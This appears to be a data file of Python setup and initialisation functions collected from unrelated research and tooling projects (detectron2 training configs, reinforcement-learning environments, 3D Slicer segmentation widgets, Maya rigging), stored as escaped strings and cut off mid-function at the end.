self._smooth_labels = False\n\n # Initialize label binarizer for RST relations if needed\n if 'discourse' in layers:\n\n # Get the RST relations from the node dictionary\n rst_relations = np.asarray(list(self.node_dict['relations'].values()))\n\n # Initialize label binarizer and fit to node labels\n self._rst_binarizer = LabelBinarizer().fit(rst_relations)\n\n # Load the requested annotation and create the graphs accordingly\n self._load(layers)\n\n # Get number of unique diagram classes in the dataset\n self.n_classes = len(np.unique(self.labels))\n\n # Get the number of node and edge classes for DGL graphs (grouping +\n # connectivity)\n if 'discourse' not in layers and not self._return_nx:\n\n # Get unique node and edge types for graphs that don't use typed\n # nodes or edges\n node_list = [x.ndata['kind'].flatten() for x in self.diagrams]\n self.n_node_classes = len(np.unique(torch.cat(node_list).numpy()))\n\n edge_list = [x.edata['kind'].flatten() for x in self.diagrams]\n self.n_edge_classes = len(np.unique(torch.cat(edge_list).numpy()))\n\n # Do the same for DGLHeteroGraphs (discourse)\n if 'discourse' in layers and not self._return_nx:\n\n node_list = np.concatenate(np.asarray([x.ntypes for x in\n self.diagrams]))\n self.n_node_classes = len(np.unique(node_list))\n\n edge_list = np.concatenate(np.asarray([x.etypes for x in\n self.diagrams]))\n self.n_edge_classes = len(np.unique(edge_list))", "def setup(args):\n # chaparral,denseForest,lake,canyon,burning,burnt = neighbours\n config_path = args[0]\n config = utils.load(config_path)\n # -- THE CA MUST BE RELOADED IN THE GUI IF ANY OF THE BELOW ARE CHANGED --\n config.title = \"Forest Fire\"\n config.dimensions = 2\n config.states = \\\n (\n CHAPARRAL,\n DENSE_FORREST,\n LAKE,\n CANYON,\n BURNING,\n BURNT,\n START_BURN,\n END_BURN\n )\n\n # ------------ -------------------------------------------------------------\n\n config.state_colors = \\\n [\n (0.6,0.6,0), #chaparral\n (0,0.4,0), #dense forrest\n (0,0.5,1), #lake\n (0.5,0.5,0.5), #canyon\n (1,0,0), #burning\n (0.25,0.25,0.25), #burnt\n (1,0.7,0), #starting to burn\n (0.8,0,0.2) #ending burn\n ]\n\n config.grid_dims = (grid_size, grid_size)\n config.num_generations = 1000\n config.set_initial_grid(initial_grid)\n config.wrap = False\n\n # --------------------------------------------------------------------\n\n # the GUI calls this to pass the user defined config\n # into the main system with an extra argument\n # do not change\n if len(args) == 2:\n config.save()\n sys.exit()\n return config", "def setup(args):\n cfg = get_cfg()\n\n cfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\"))\n cfg.merge_from_list(args.opts)\n\n # configs for training\n if args.small_vidor: # cfg.DATASETS.VIDOR.SIZE == 'small':\n cfg.DATASETS.TRAIN = (\"vidor_small_train\",)\n elif args.small_vidor_10imgs: # cfg.DATASETS.VIDOR.SIZE == 'small-10imgs':\n cfg.DATASETS.TRAIN = (\"vidor_small_10imgs_train\",)\n else:\n cfg.DATASETS.TRAIN = (\"vidor_large_train\",)\n # cfg.DATALOADER.NUM_WORKERS = 2\n if not args.eval_only:\n cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\") # Let training initialize from model zoo\n factor = 4\n cfg.SOLVER.IMS_PER_BATCH = 16 * factor\n cfg.SOLVER.BASE_LR = 0.0001 * factor # finetune using 10x smaller base_lr\n cfg.SOLVER.MAX_ITER = 270000 // factor \n cfg.SOLVER.STEPS = [210000 // factor, 250000 // factor]\n # cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128 # default: 512\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = 78\n\n # configs for testing\n # cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_final.pth\")\n if args.small_vidor: # cfg.DATASETS.VIDOR.SIZE == 'small':\n cfg.DATASETS.TEST = (\"vidor_small_val\",)\n elif args.small_vidor_10imgs: # cfg.DATASETS.VIDOR.SIZE == 'small-10imgs':\n cfg.DATASETS.TEST = (\"vidor_small_10imgs_val\",)\n else:\n cfg.DATASETS.TEST = (\"vidor_large_val\",)\n # cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5\n\n # cfg.OUTPUT_DIR = './output/train_vidor_with_pseudo_labels'\n \n \n if not args.eval_only:\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n cfg.freeze()\n default_setup(cfg, args)\n return cfg", "def __init__(self,config = None):\n \n self.join_path = join_path\n self.label_path = cfg['labels_path']\n self.pick_path = (cfg['result_path'] + cfg['pickle_path'])\n self.label_dir = os.path.join(CWD_PATH,self.join_path, self.label_path)\n\n #Variables inherent to the Fluent data: \n self.num_ins = 4\n\n self.scale_var = cfg['scale_var']\n # User set values are below. These can be adjusted in config.yml \n self.MSE_thresh1 = (cfg['thresh1']*self.scale_var)**2\n self.MSE_thresh2 = (cfg['thresh2']*self.scale_var)**2\n self.MSE_thresh3 = (cfg['thresh3']*self.scale_var)**2\n \n self.rew_goal = cfg['reward'] * self.scale_var\n\n self.noise = cfg['noise']\n self.minmaxbuffer = cfg['minmaxbuffer']\n\n # Get the function of input-output mapping, and max & min:\n [self.O_CH4_flow_uniformity, mins,maxes] = self.get_funcs('O_CH4_flow_uniformity')\n [self.O_CH4_mol_frac, mins,maxes] = self.get_funcs('O_CH4_mol_frac')\n [self.O_t, mins, maxes] = self.get_funcs('O_t')\n \n self.mins = mins# * self.scale_var\n self.maxes = maxes#* self.scale_var\n #Action range is a percentage of the total range\n self.action_range = cfg['action_range']*self.scale_var\n\n #Action space is the up & down range for the 4 actions \n self.action_space = Box(-self.action_range, self.action_range, shape=(self.num_ins,), dtype=np.float32)\n\n # For ref, this is a 10d state space:\n #in: 1 ch4 flow, 2 ch4 t, 3 o2 flow, 4 o2 t,\n #out: 5 flow unif, 6 mol frac, 7 temp\n #out - target: 8 flow unif, 9 mol frac, 10 temp\n \n self.observation_space = Tuple((Box(self.mins.values[0],self.maxes.values[0],shape=(1,), dtype=np.float32),\n Box(self.mins.values[1],self.maxes.values[1],shape=(1,), dtype=np.float32),\n Box(self.mins.values[2],self.maxes.values[2],shape=(1,), dtype=np.float32),\n Box(self.mins.values[3],self.maxes.values[3],shape=(1,), dtype=np.float32),\n Box(self.mins.values[4],self.maxes.values[4],shape=(1,), dtype=np.float32),\n Box(self.mins.values[5],self.maxes.values[5],shape=(1,), dtype=np.float32),\n Box(self.mins.values[6],self.maxes.values[6],shape=(1,), dtype=np.float32),\n Box(self.mins.values[4],self.maxes.values[4],shape=(1,), dtype=np.float32),\n Box(self.mins.values[5],self.maxes.values[5],shape=(1,), dtype=np.float32),\n Box(self.mins.values[6],self.maxes.values[6],shape=(1,), dtype=np.float32)))\n \n # TODO this isn't really a proper gym spec\n self._spec = lambda: None\n self._spec.id = \"AllVar-v0\"\n \n # For rendering:\n self.viewer = None\n self.labels = cfg['labels']\n \n #initialize variables for tracking:\n self.episode = 0\n self.reward = 0\n self.reset()", "def __init__(self, cfg_index, conditions, pars_dir, step_title, use_defaults, input_cfg_json_data):\n super().__init__(cfg_index, conditions, pars_dir, step_title, use_defaults, input_cfg_json_data)\n self.set_name = \"alignment\"\n if input_cfg_json_data:\n self._read_custom_pars()\n else:\n self._combine_conditions()", "def init_vars():\n\tda_vinci.base.usepackage(\"pgfkeys\")\n\tda_vinci.base.add_preamble(setup_script)", "def setup_flags(self):\n self.io_args.color = self.io_args.color_full\n self.io_args.rig_in = self.io_args.rig\n self.io_args.matches = os.path.join(self.io_args.output_root, \"matches.json\")\n self.io_args.rig_out = os.path.join(self.io_args.output_root, \"rig.json\")", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] = torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n self.critics_tar[idx] = torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n self.var = self.min_var if self.var < self.min_var else self.var\n old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n # Note: if you need load old model, there should be a procedure for juding if the trainers[idx] is None\n for i in range(self.num_agents):\n self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n # return the old data, no need to update the trainers\n if args.restore == True: return old_data\n\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target par using the cur\n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target par using the cur", "def __init__(self, modifications = {}):\n CoveredState.__init__(self, BASE_CONFIG, coverLayers = TOTAL_LAYERS)\n for name in modifications:\n self.Edit(name, modifications[name])\n if unix:\n self.Cover(\"BuilderDir\", VELAUNCHER_DIR, layer = UNAVAILABLE_LAYER)", "def _augment_pipeline_cfg(self):", "def set_defaults(args):\n # Check critical files exist\n args.train_file = os.path.join(args.data_dir, args.train_file)\n if not os.path.isfile(args.train_file):\n raise IOError('No such file: %s' % args.train_file)\n args.dev_file = os.path.join(args.data_dir, args.dev_file)\n if not os.path.isfile(args.dev_file):\n raise IOError('No such file: %s' % args.dev_file)\n if args.embedding_file:\n args.embedding_file = os.path.join(args.embed_dir, args.embedding_file)\n if not os.path.isfile(args.embedding_file):\n raise IOError('No such file: %s' % args.embedding_file)\n\n # Set model directory\n subprocess.call(['mkdir', '-p', args.model_dir])\n\n # Set model name\n if not args.model_name:\n import uuid\n import time\n args.model_name = time.strftime(\"%Y%m%d-\") + str(uuid.uuid4())[:8]\n\n # Set log + model file names\n args.log_file = os.path.join(args.model_dir, args.model_name + '.txt')\n args.model_file = os.path.join(args.model_dir, args.model_name + '.pt')\n\n # Embeddings options\n if args.embedding_file:\n with open(args.embedding_file) as f:\n dim = len(f.readline().strip().split(' ')) - 1\n args.embedding_dim = dim\n elif not args.embedding_dim:\n raise RuntimeError('Either embedding_file or embedding_dim '\n 'needs to be specified.')\n\n # Make sure fix_embeddings and embedding_file are consistent\n if args.fix_embeddings:\n if not (args.embedding_file or args.pretrained):\n logger.warning('WARN: fix_embeddings set to False '\n 'as embeddings are random.')\n args.fix_embeddings = False\n return args", "def fill_args(args):\n args.agent_module = 'dstar_sgolam_walker'\n args.checkpoint_path = None\n args.exp_config = 'configs/baselines/dstar_proto_sgolam.yaml'\n args.num_episodes = 25\n \n return args", "def addControl(*args):", "def addControl(*args):", "def addControl(*args):", "def addControl(*args):", "def add_source_achors():\n pass", "def __init__(self, parent=None):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None", "def __init__(self, parent=None):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None\n self._parameterNode = None\n self.T1_LLN_Node = None\n self.T1_LLE_Node = None\n self.ECVMapNode = None\n self.LLE_Node = None\n self.LLN_Node = None\n self.ArefNode = None\n self.T1_LLE_Name = 'T1 Enhanced'\n self.T1_LLN_Name = 'T1 Native'\n self.ResetSliceViews()\n self.LinkSlices()\n self.ColorBarEnabled()\n self.setupVolumeNodeViewLayout()\n self.Warning = True", "def controls_setup(self):\n pass", "def load_defaults(self):\n self.set_motor_limits(self.MOTOR_LEFT, self.LEFT_DEFAULT)\n self.set_motor_limits(self.MOTOR_RIGHT, self.RIGHT_DEFAULT)\n self.set_servo(self.SERVO_1, self.MIDPOINT)", "def load_defaults(self):\n self.set_motor_limits(self.MOTOR_LEFT, self.LEFT_DEFAULT)\n self.set_motor_limits(self.MOTOR_RIGHT, self.RIGHT_DEFAULT)\n self.set_servo(self.SERVO_1, self.MIDPOINT)", "def load_defaults(self):\n self.set_motor_limits(self.MOTOR_LEFT, self.LEFT_DEFAULT)\n self.set_motor_limits(self.MOTOR_RIGHT, self.RIGHT_DEFAULT)\n self.set_servo(self.SERVO_1, self.MIDPOINT)", "def __init__(self, *args, **kwargs):\n super(MayaScene, self).__init__(*args, **kwargs)", "def onReset(self):\n #productive\n profprint()\n fileName = pathToScene = slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\",\"Config/default.cfg\")\n self.logic.loadParameters(fileName)", "def setup(self) -> None:\n mlflow.set_tracking_uri('file://' + hutils.get_original_cwd() + '/mlruns')\n if self.log_mlflow:\n mlflow.set_experiment(self.config.runner.exp_name)\n \n if self.log_mlflow:\n self.log_parameters(self.config)\n mlflow.log_param('node', os.uname()[1])", "def setUp(params, spec):\n\n if not params['fkSkeleton']:\n joints = []\n\n for x in range(params['numberOfSegments']):\n jnt = cmds.createNode('joint')\n jnt = cmds.rename(jnt, '{baseName}{index}_{JNT}'.format(baseName=spec.name, index=x, JNT=JNT)).split('|')[-1]\n if x > 0:\n cmds.parent(jnt, joints[x - 1])\n cmds.setAttr('{node}.translateY'.format(node=jnt), 1.0)\n joints.append(jnt)\n\n spec.params()['fkSkeleton'] = dragonfly.node.dfNode.fromList(joints)\n\n if not params['fkControls']:\n controls = []\n\n for x in range(params['fkNumberOfSegments']):\n ctl = cmds.curve(**CONTROL_SHAPE_DATA)\n cmds.controller(ctl)\n ctl = cmds.rename(ctl, '{baseName}{index}_{CTL}'.format(baseName=spec.name, index=x, CTL=CTL))\n match_nodes(params['fkSkeleton'][x].name(), ctl)\n if x > 0:\n cmds.parent(ctl, controls[x-1])\n controls.append(ctl)\n\n spec.params()['fkControls'] = dragonfly.node.dfNode.fromList(controls)", "def setupOptionsFrame(self):\n\n # CPU / CUDA options\n self.device.addItems([\"cuda\", \"cpu\"])\n self.scriptedEffect.addLabeledOptionsWidget(\"Device:\", self.device)\n\n self.modality.addItems([\"CT\", \"MRI\"])\n self.scriptedEffect.addLabeledOptionsWidget(\"Modality:\", self.modality)\n\n # Add ROI options\n self.roiSelector.nodeTypes = ['vtkMRMLMarkupsROINode']\n self.roiSelector.noneEnabled = True\n self.roiSelector.setMRMLScene(slicer.mrmlScene)\n self.scriptedEffect.addLabeledOptionsWidget(\"ROI: \", self.roiSelector)\n\n # Toggle ROI visibility button\n toggleROIVisibilityButton = qt.QPushButton(\"Toggle ROI Visibility\")\n toggleROIVisibilityButton.objectName = self.__class__.__name__ + 'ToggleROIVisibility'\n toggleROIVisibilityButton.setToolTip(\"Toggle selected ROI visibility\")\n toggleROIVisibilityButton.connect('clicked()', self.toggleROIVisibility)\n self.scriptedEffect.addOptionsWidget(toggleROIVisibilityButton)\n\n # Apply button\n applyButton = qt.QPushButton(\"Apply\")\n applyButton.objectName = self.__class__.__name__ + 'Apply'\n applyButton.setToolTip(\"Extract liver from input volume\")\n applyButton.connect('clicked()', self.onApply)\n self.scriptedEffect.addOptionsWidget(applyButton)", "def setup(self, path_to_conf_file):\n\n self.track = Track.SENSORS\n self.num_frames = 0\n\n with open(path_to_conf_file, 'r') as f:\n config = yaml.safe_load(f)\n\n for key, value in config.items():\n setattr(self, key, value)\n\n self.device = torch.device('cuda')\n\n self.image_model = CameraModel(config).to(self.device)\n self.image_model.load_state_dict(torch.load(self.main_model_dir))\n self.image_model.eval()\n\n self.vizs = []\n\n self.waypointer = None\n\n if self.log_wandb:\n wandb.init(project='carla_evaluate')\n \n self.steers = torch.tensor(np.linspace(-self.max_steers,self.max_steers,self.num_steers)).float().to(self.device)\n self.throts = torch.tensor(np.linspace(0,self.max_throts,self.num_throts)).float().to(self.device)\n\n self.prev_steer = 0\n self.lane_change_counter = 0\n self.stop_counter = 0", "def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n globalPath, _ = os.path.split( os.path.splitext( slicer.modules.regularizedfastmarching.path )[0] )\n self.globalPath = globalPath + \"/Resources/SegmentationFastMarching/\"\n self.volumesPath = self.globalPath + \"Volumes/\"\n self.seedsCsvPath = self.globalPath + \"SeedsLabels/\"\n self.seedsPath = self.globalPath + \"Seeds/\"\n self.regularizationsPath = self.globalPath + \"Regularizations/\"\n self.segmentationsPath = self.globalPath + \"Segmentations/\"\n\n self.logic = RegularizedFastMarchingLogic()\n # self.logic.previousVolumeName = None\n # self.logic.imgLabel = np.array([])\n # self.logic.previousImgIds = np.array([])\n # self.logic.imgDist = np.array([])\n\n # Hide the Slicer Logo to increase space\n slicer.util.findChild(slicer.util.mainWindow(), 'LogoLabel').visible = False\n \n #\n #region Restart Slicer Area\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Reload\"\n self.layout.addWidget(parametersCollapsibleButton)\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n self.restartSlicerButton = qt.QPushButton(\"Restart Slicer\")\n self.restartSlicerButton.connect('clicked(bool)', slicer.util.restart)\n parametersFormLayout.addRow(self.restartSlicerButton)\n #endregion \n\n #\n #region Load Data Area\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Seeds\"\n self.layout.addWidget(parametersCollapsibleButton)\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n \n #\n # File name volume .nii\n # \n # self.volueNameComboBox = qt.QComboBox() \n # self.volueNameComboBox = self.fillComboBox(self.volueNameComboBox, self.volumesPath, \".nii\")\n # parametersFormLayout.addRow(\"Volumes .nii: \", self.volueNameComboBox)\n \n #\n # Load volume buttons\n #\n # horizontalLayout = qt.QHBoxLayout()\n # self.loadBrainVolumeButton = qt.QPushButton(\"Load Example Volume\")\n # self.loadBrainVolumeButton.enabled = True\n # horizontalLayout.addWidget(self.loadBrainVolumeButton)\n \n #\n # Load custom volumes buttons\n #\n # self.loadCustomVolumeButton = qt.QPushButton(\"Load Selected Volume\")\n # self.loadCustomVolumeButton.enabled = True\n # horizontalLayout.addWidget(self.loadCustomVolumeButton) \n # parametersFormLayout.addRow(horizontalLayout)\n \n \n #\n # Add vertical spacing\n # \n # verticalSpacer = qt.QSpacerItem(0, 20, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n # parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Seeds files and a text line to load / save seeds from the scene\n #\n horizontalLayout = qt.QHBoxLayout()\n fileNameSeedsLabel = qt.QLabel(\"Seeds: \")\n self.fileNameSeedsComboBox = qt.QComboBox() \n self.fileNameSeedsComboBox = self.fillComboBox(self.fileNameSeedsComboBox, self.seedsPath, \".seed\") \n self.fileNameSeedsLineEdit = qt.QLineEdit()\n horizontalLayout.addWidget(fileNameSeedsLabel)\n horizontalLayout.addWidget(self.fileNameSeedsComboBox)\n horizontalLayout.addWidget(self.fileNameSeedsLineEdit)\n self.fileNameSeedsComboBox.currentTextChanged.connect(self.setSelectedSeedsFile)\n self.setSelectedSeedsFile(self.fileNameSeedsComboBox.currentText)\n parametersFormLayout.addRow(horizontalLayout)\n \n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 20, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Save markers Button\n #\n horizontalLayout = qt.QHBoxLayout()\n self.saveMarkersButton = qt.QPushButton(\"Save markers\")\n self.saveMarkersButton.toolTip = \"Save the markers in a fcsv file\"\n self.saveMarkersButton.enabled = True\n horizontalLayout.addWidget(self.saveMarkersButton)\n \n #\n # Load markers Button\n #\n self.loadMarkersButton = qt.QPushButton(\"Load markers\")\n self.loadMarkersButton.toolTip = \"Load the markers from fcsv file.\"\n self.loadMarkersButton.enabled = True\n horizontalLayout.addWidget(self.loadMarkersButton) \n \n #\n # Clear markups Button\n #\n self.clearButton = qt.QPushButton(\"Clear all markups\")\n self.clearButton.toolTip = \"Remove all fiducial markers.\"\n self.clearButton.enabled = True\n horizontalLayout.addWidget(self.clearButton)\n parametersFormLayout.addRow(horizontalLayout)\n \n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 25, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Fiducial placement button\n #\n \"\"\"\n Add this markup in the markupsList and rename it depending on seeds combobox's value\n \"\"\"\n @vtk.calldata_type(vtk.VTK_INT)\n def onMarkupAdded(caller, event, index): \n markupsNode = caller\n # Label, Name\n seedTokens = self.currentSeedNameComboBox.currentText.replace(\" \", \"\").split(\":\")\n markupsNode.SetNthFiducialLabel(index, seedTokens[1])\n markupsNode.SetNthControlPointDescription(index, seedTokens[0])\n \n self.w=slicer.qSlicerMarkupsPlaceWidget()\n self.w.setMRMLScene(slicer.mrmlScene)\n \n markupsNode = slicer.mrmlScene.GetFirstNodeByName(\"MarkupsFiducial\")\n if markupsNode == None: \n markupsNode = slicer.mrmlScene.AddNewNodeByClass(\"vtkMRMLMarkupsFiducialNode\")\n markupsNode.CreateDefaultDisplayNodes()\n \n # On markup added event: format the added markup\n markupsNode.AddObserver(slicer.vtkMRMLMarkupsNode.PointPositionDefinedEvent, onMarkupAdded)\n self.w.setCurrentNode(markupsNode)\n # Hide all buttons and only show place button\n self.w.buttonsVisible=True\n self.w.placeButton().show()\n self.w.show()\n parametersFormLayout.addRow(self.w)\n \n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 20, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # File name data's seeds\n # \n self.fileNameDataComboBox = qt.QComboBox() \n self.fileNameDataComboBox = self.fillComboBox(self.fileNameDataComboBox, self.seedsCsvPath, \".csv\") \n self.fileNameDataComboBox.currentTextChanged.connect(self.setSeedsLabelFromFile)\n parametersFormLayout.addRow(\"Seeds labels csv: \", self.fileNameDataComboBox)\n\n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n horizontalLayout = qt.QHBoxLayout()\n # Seeds label \n self.seedsLabelText = qt.QLabel()\n self.seedsLabelText.text = \"Labels:\"\n horizontalLayout.addWidget(self.seedsLabelText)\n \n # ComboxBox containing names and labels\n self.currentSeedNameComboBox= qt.QComboBox()\n \n # Add labels depending on first csv file found\n self.setSeedsLabelFromFile(self.fileNameDataComboBox.currentText)\n horizontalLayout.addWidget(self.currentSeedNameComboBox)\n \n self.clearOrganButton = qt.QPushButton(\"Clear this organ\")\n self.clearOrganButton.toolTip = \"Remove all fiducial markers for this organ.\"\n self.clearOrganButton.enabled = True\n horizontalLayout.addWidget(self.clearOrganButton)\n parametersFormLayout.addRow(horizontalLayout)\n \n #endregion\n\n\n #\n #region Segmentation Parameters Area\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Parameters\"\n self.layout.addWidget(parametersCollapsibleButton)\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n\n #\n # input volume selector\n #\n self.inputSelector = slicer.qMRMLNodeComboBox()\n self.inputSelector.nodeTypes = [\"vtkMRMLScalarVolumeNode\"]\n self.inputSelector.selectNodeUponCreation = True\n self.inputSelector.addEnabled = False\n self.inputSelector.removeEnabled = False\n self.inputSelector.noneEnabled = False\n self.inputSelector.showHidden = False\n self.inputSelector.showChildNodeTypes = False\n self.inputSelector.setMRMLScene( slicer.mrmlScene )\n self.inputSelector.setToolTip( \"Pick the input to the algorithm.\" )\n parametersFormLayout.addRow(\"Input Volume: \", self.inputSelector)\n\n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Segmentation distance to stop the algo\n #\n self.distance = ctk.ctkSliderWidget()\n self.distance.singleStep = 10\n self.distance.minimum = 0\n self.distance.maximum = 1000\n self.distance.value = 100\n self.distance.setToolTip(\"Set the maximum geodesic distance allowed from a seed\")\n parametersFormLayout.addRow(\"Distance\", self.distance)\n \n #\n # Margin to build masks\n #\n self.marginMask = ctk.ctkSliderWidget()\n self.marginMask.singleStep = 1\n self.marginMask.minimum = 0\n self.marginMask.maximum = 50\n self.marginMask.value = 15\n self.marginMask.setToolTip(\"Margin used to build masks for each seed\")\n parametersFormLayout.addRow(\"Mask Margin (voxel)\", self.marginMask)\n\n #\n # Gamma to prevent the seeds to cross bridges between organs\n #\n self.gammaSlider = qt.QSlider(qt.Qt.Horizontal)\n self.gammaSlider.setRange(0, 1000)\n self.gammaSlider.setSingleStep(1)\n self.gammaSlider.setPageStep(10)\n self.gammaSlider.setValue(25)\n\n self.gammaSpinBox = qt.QDoubleSpinBox()\n self.gammaSpinBox.setDecimals(3)\n self.gammaSpinBox.setRange(0, 1)\n self.gammaSpinBox.setSingleStep(0.001)\n self.gammaSpinBox.setValue(0.025)\n\n self.gammaSlider.valueChanged.connect(self.setGammaValueFromSlider)\n self.gammaSpinBox.valueChanged.connect(self.setGammaValueFromSpinBox)\n \n horizontalLayout = qt.QHBoxLayout()\n horizontalLayout.addWidget(self.gammaSlider)\n horizontalLayout.addWidget(self.gammaSpinBox)\n\n parametersFormLayout.addRow(\"Regularization weight\", horizontalLayout)\n \n #\n # Regularization radius\n #\n self.regularizationDiameter = ctk.ctkSliderWidget()\n self.regularizationDiameter.singleStep = 1\n self.regularizationDiameter.minimum = 1\n self.regularizationDiameter.maximum = 20\n self.regularizationDiameter.value = 4\n self.regularizationDiameter.setToolTip(\"Margin used to build masks for each seed\")\n parametersFormLayout.addRow(\"Regularization Diameter (voxels)\", self.regularizationDiameter)\n \n #\n # Threshold to prevent the seeds to spread over a range intensities\n #\n self.minThresholdSlider = ctk.ctkSliderWidget()\n self.minThresholdSlider.singleStep = 1\n self.minThresholdSlider.minimum = 0\n self.minThresholdSlider.maximum = 255\n self.minThresholdSlider.value = 40\n self.minThresholdSlider.setToolTip(\"Seeds cannot spread below this value\")\n self.minThresholdSlider.valueChanged.connect(self.setMinThresholdValue)\n parametersFormLayout.addRow(\"Min Threshold (digital level)\", self.minThresholdSlider)\n\n self.maxThresholdSlider = ctk.ctkSliderWidget()\n self.maxThresholdSlider.singleStep = 1\n self.maxThresholdSlider.minimum = 0\n self.maxThresholdSlider.maximum = 255\n self.maxThresholdSlider.value = 255\n self.maxThresholdSlider.setToolTip(\"Seeds cannot spread over this value\")\n self.maxThresholdSlider.valueChanged.connect(self.setMaxThresholdValue)\n parametersFormLayout.addRow(\"Max Threshold (digital level)\", self.maxThresholdSlider)\n\n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Check box to keep or not last segmentation\n #\n self.removeLastSegmentationCheckBox = qt.QCheckBox(\"\")\n self.removeLastSegmentationCheckBox.setChecked(True)\n parametersFormLayout.addRow(\"Remove last segmentation\", self.removeLastSegmentationCheckBox)\n \n #\n # Show the background seed of the next segmentation\n #\n self.showBackGroundCheckBox = qt.QCheckBox(\"\")\n self.showBackGroundCheckBox.setChecked(False)\n parametersFormLayout.addRow(\"Show background\", self.showBackGroundCheckBox)\n \n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Segment Button\n #\n self.segmentButton = qt.QPushButton(\"Segment\")\n self.segmentButton.toolTip = \"Run the algorithm.\"\n self.segmentButton.enabled = False\n parametersFormLayout.addRow(self.segmentButton)\n #endregion \n\n #\n #region Load Save segmentations\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Segmentations\"\n self.layout.addWidget(parametersCollapsibleButton)\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n\n #\n # Checkbox to save the segmentation using the labels \n #\n self.saveByLabelsCheckBox = qt.QCheckBox(\"\")\n self.saveByLabelsCheckBox.setChecked(True)\n parametersFormLayout.addRow(\"Save by labels\", self.saveByLabelsCheckBox)\n\n #\n # Checkbox to save the segmentation using the voxels intensities \n #\n self.saveByIntensitiesCheckBox = qt.QCheckBox(\"\")\n self.saveByIntensitiesCheckBox.setChecked(False)\n parametersFormLayout.addRow(\"Save by intensities\", self.saveByIntensitiesCheckBox)\n\n #\n # Checkbox to generate segments data \n #\n self.generateDataCsvCheckBox = qt.QCheckBox(\"\")\n self.generateDataCsvCheckBox.setChecked(False)\n parametersFormLayout.addRow(\"Generate segments data CSV\", 